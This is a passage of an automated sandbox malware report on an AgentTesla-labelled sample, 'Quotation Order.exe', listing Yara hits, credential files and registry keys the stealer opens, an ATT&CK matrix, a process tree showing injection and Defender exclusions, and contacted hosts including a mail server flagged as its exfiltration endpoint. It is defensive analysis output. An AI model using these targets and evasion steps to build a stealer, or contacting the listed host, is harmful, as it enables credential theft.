                    Source: Amcache.hve.35.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.35.dr | Binary or memory string: msmpeng.exe
                    Source: Amcache.hve.35.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: svchost.exe, 00000007.00000002.2515010756.000001E49BD02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Files%\Windows Defender\MsMpeng.exe
                    Source: svchost.exe, 00000007.00000002.2515010756.000001E49BD02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: Amcache.hve.35.dr | Binary or memory string: MsMpEng.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob
                    Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 17.2.svchost.exe.1fc9f239308.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 17.2.svchost.exe.1fc9f1fd6c0.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 26.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 17.2.svchost.exe.1fc9f1fd6c0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000001F.00000002.1627243849.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001A.00000002.1487009646.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002B.00000002.2520439287.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001F.00000002.1627243849.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001A.00000002.1472724735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001F.00000002.1627243849.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002B.00000002.2520439287.0000000002F52000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000038.00000002.2517527074.0000000003282000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001A.00000002.1487009646.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000038.00000002.2517527074.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001A.00000002.1487009646.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000038.00000002.2517527074.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000011.00000002.1465404864.000001FC9F1C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: svchost.exe PID: 8164, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7976, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 7440, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7240, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 4884, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara match | File source: 17.2.svchost.exe.1fc9f239308.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 17.2.svchost.exe.1fc9f1fd6c0.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 26.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 17.2.svchost.exe.1fc9f1fd6c0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000001F.00000002.1627243849.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001A.00000002.1472724735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002B.00000002.2520439287.0000000002F52000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000038.00000002.2517527074.0000000003282000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001A.00000002.1487009646.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000011.00000002.1465404864.000001FC9F1C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: svchost.exe PID: 8164, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7976, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 7440, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7240, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 4884, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: 17.2.svchost.exe.1fc9f239308.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 17.2.svchost.exe.1fc9f1fd6c0.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 26.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 17.2.svchost.exe.1fc9f1fd6c0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000001F.00000002.1627243849.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001A.00000002.1487009646.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002B.00000002.2520439287.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001F.00000002.1627243849.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001A.00000002.1472724735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001F.00000002.1627243849.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002B.00000002.2520439287.0000000002F52000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000038.00000002.2517527074.0000000003282000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001A.00000002.1487009646.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000038.00000002.2517527074.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001A.00000002.1487009646.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000038.00000002.2517527074.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000011.00000002.1465404864.000001FC9F1C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: svchost.exe PID: 8164, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7976, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 7440, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7240, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 4884, type: MEMORYSTR
                    MITRE ATT&CK Matrix (a cell's leading number is the count of signatures mapped to that technique; cells without a number are the matrix's default entries with no matching signature)

                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | 1 Scripting | Valid Accounts | 241 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 311 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 211 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 45 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Obfuscated Files or Information | 1 Credentials in Registry | 771 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | 11 Registry Run Keys / Startup Folder | 11 Registry Run Keys / Startup Folder | 1 Timestomp | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Input Capture | 2 Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 381 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 381 Virtualization/Sandbox Evasion | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 211 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Hidden Files and Directories | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    Behavior Graph ID: 1432027 | Sample: Quotation Order.exe | Startdate: 26/04/2024 | Architecture: WINDOWS | Score: 100

                    The graph is reproduced here as a process tree. Numbers in parentheses are the graph's node IDs; bracketed numbers after a process are the per-node counters drawn on the graph (see the legend above).

                    Start (node 2)
                      DNS/IP: mail.bonnyriggdentalsurgery.com.au (73); ip-api.com (75); bg.microsoft.map.fastly.net (77)
                      Signatures: Found malware configuration (83); Malicious sample detected (through community Yara rule) (85); Multi AV Scanner detection for submitted file (87); 17 other signatures (89)
                      Started: Quotation Order.exe (10) [1 8]; svchost.exe (14) [1 4]; svchost.exe (16); 9 other processes (18)

                    Quotation Order.exe (10)
                      Dropped: C:\Users\user\AppData\Roaming\svchost.exe, PE32+ (71)
                      Signatures: Creates multiple autostart registry keys (127); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) (129)
                      Started: cmd.exe (20) [1]; cmd.exe (22) [1]; conhost.exe (25)

                    svchost.exe (14)
                      Signatures: Multi AV Scanner detection for dropped file (131); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) (133); Writes to foreign memory regions (135); Disables UAC (registry) (137)
                      Started: AddInProcess32.exe (27); 5 other processes (33)

                    svchost.exe (16)
                      Signatures: Adds a directory exclusion to Windows Defender (139); Injects a PE file into a foreign processes (141)
                      Started: CasPol.exe (29); 3 other processes (35)

                    9 other processes (18)
                      Signatures: Query firmware table information (likely to detect VMs) (143); Changes security center settings (notifications, updates, antivirus, firewall) (145)
                      Started: AddInProcess32.exe (31); 8 other processes (37)

                    cmd.exe (20)
                      Started: svchost.exe (39) [4]; conhost.exe (42); timeout.exe (44) [1]

                    cmd.exe (22)
                      Signatures: Uses schtasks.exe or at.exe to add and modify task schedules (91)
                      Started: conhost.exe (46); schtasks.exe (48) [1]

                    AddInProcess32.exe (27)
                      Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) (93); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) (95); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) (97); Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) (99)

                    CasPol.exe (29)
                      Signatures: Tries to steal Mail credentials (via file / registry access) (101); Tries to harvest and steal ftp login credentials (103); Tries to harvest and steal browser information (history, passwords, etc) (105)

                    AddInProcess32.exe (31)
                      Signatures: Hides that the sample has been downloaded from the Internet (zone.identifier) (107)

                    5 other processes (33)
                      Started: conhost.exe (50)

                    3 other processes (35)
                      Started: conhost.exe (52)

                    8 other processes (37)
                      Signatures: Loading BitLocker PowerShell Module (109)
                      Started: conhost.exe (54)

                    svchost.exe (39)
                      Signatures: Writes to foreign memory regions (111); Adds a directory exclusion to Windows Defender (113); Injects a PE file into a foreign processes (115)
                      Started: CasPol.exe (56); powershell.exe (61); conhost.exe (63); 5 other processes (65)

                    CasPol.exe (56)
                      DNS/IP: mail.bonnyriggdentalsurgery.com.au 192.254.225.166, ports 49703, 49708, 49717, UNIFIEDLAYER-AS-1US, United States (79); ip-api.com 208.95.112.1, ports 49701, 49705, 49715, TUT-ASUS, United States (81)
                      Dropped: C:\Users\user\AppData\Roaming\...\avdfUcC.exe, PE32 (69)
                      Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) (117); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) (119); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) (121); 3 other signatures (125)

                    powershell.exe (61)
                      Signatures: Loading BitLocker PowerShell Module (123)
                      Started: conhost.exe (67)

                    Source | Detection | Scanner | Label | Link
                    Quotation Order.exe | 32% | ReversingLabs | Win64.Trojan.AgentTesla |
                    Quotation Order.exe | 29% | Virustotal | | Browse
                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\svchost.exe | 32% | ReversingLabs | Win64.Trojan.AgentTesla |
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    http://Passport.NET/tbpose | 0% | URL Reputation | safe |
                    http://passport.net/tb | 0% | URL Reputation | safe |
                    https://dynamic.t | 0% | URL Reputation | safe |
                    http://Passport.NET/STS | 0% | URL Reputation | safe |
                    http://x1.c.lencr.org/0 | 0% | URL Reputation | safe |
                    http://x1.i.lencr.org/0 | 0% | URL Reputation | safe |
                    http://r3.o.lencr.org0 | 0% | URL Reputation | safe |
                    http://Passport.NET/tb_ | 0% | Avira URL Cloud | safe |
                    http://r3.i.lencr.org/0T | 0% | Avira URL Cloud | safe |
                    http://mail.bonnyriggdentalsurgery.com.au | 0% | Avira URL Cloud | safe |
                    http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd | 0% | Avira URL Cloud | safe |
                    http://www.microsoft.co4 | 0% | Avira URL Cloud | safe |
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | unknown
                    mail.bonnyriggdentalsurgery.com.au | 192.254.225.166 | true | true | | unknown
                    ip-api.com | 208.95.112.1 | true | false | | high
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 00000003.00000003.1363757483.00000215E6C67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366478054.00000215E6C68000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://account.live.com/msangcwamvice | svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    http://docs.oasis-open.org/wss/2004/01 | svchost.exe, 00000024.00000002.2515299531.000002B804E73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1425819438.000002B804E72000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdonMe | svchost.exe, 00000024.00000002.2517767699.000002B805778000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426108352.000002B805776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://login.microsoftonline.com/ppsecure/ResolveUser.srf | svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    http://standards.iso.org/iso/19770/-2/2009/schema.xsd | svchost.exe, 00000008.00000002.2513040274.0000029957118000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2511975756.0000029956887000.00000004.00000020.00020000.00000000.sdmp, regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.8.dr | false | | high
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA | svchost.exe, 00000024.00000002.2517767699.000002B805778000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426108352.000002B805776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1426050902.000002B805775000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    http://Passport.NET/tbpose | svchost.exe, 00000024.00000002.2518501231.000002B805C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2519109221.000002B805CB3000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 00000003.00000002.1366447349.00000215E6C63000.00000004.00000020.00020000.00000000.sdmp | false
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 00000024.00000002.2517675071.000002B80576F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1434712094.000002B80576E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000003.00000002.1366055215.00000215E6C3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://mail.bonnyriggdentalsurgery.com.auAddInProcess32.exe, 0000001A.00000002.1487009646.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002C06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032B7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.00000000032AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAsvchost.exe, 00000024.00000003.1360706982.000002B805729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdssvchost.exe, 00000024.00000003.1400049966.000002B805774000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://ip-api.comAddInProcess32.exe, 0000001A.00000002.1487009646.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.000000000325C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://login.microsoftonline.com/ppsecure/devicechangecredential.srfsvchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQuotation Order.exe, 00000000.00000002.1287260691.000002598039A000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000038.00000002.2517527074.000000000325C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.bingmapsportal.comsvchost.exe, 00000003.00000002.1365924349.00000215E6C13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1363814571.00000215E6C62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1364259093.00000215E6C5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366447349.00000215E6C63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://Passport.NET/tb_svchost.exe, 00000024.00000003.1390016964.000002B804EE4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2516290801.000002B804EE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/02/scs-cbcsvchost.exe, 00000024.00000003.1434799034.000002B805766000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue1svchost.exe, 00000024.00000002.2517675071.000002B80576F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1434712094.000002B80576E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
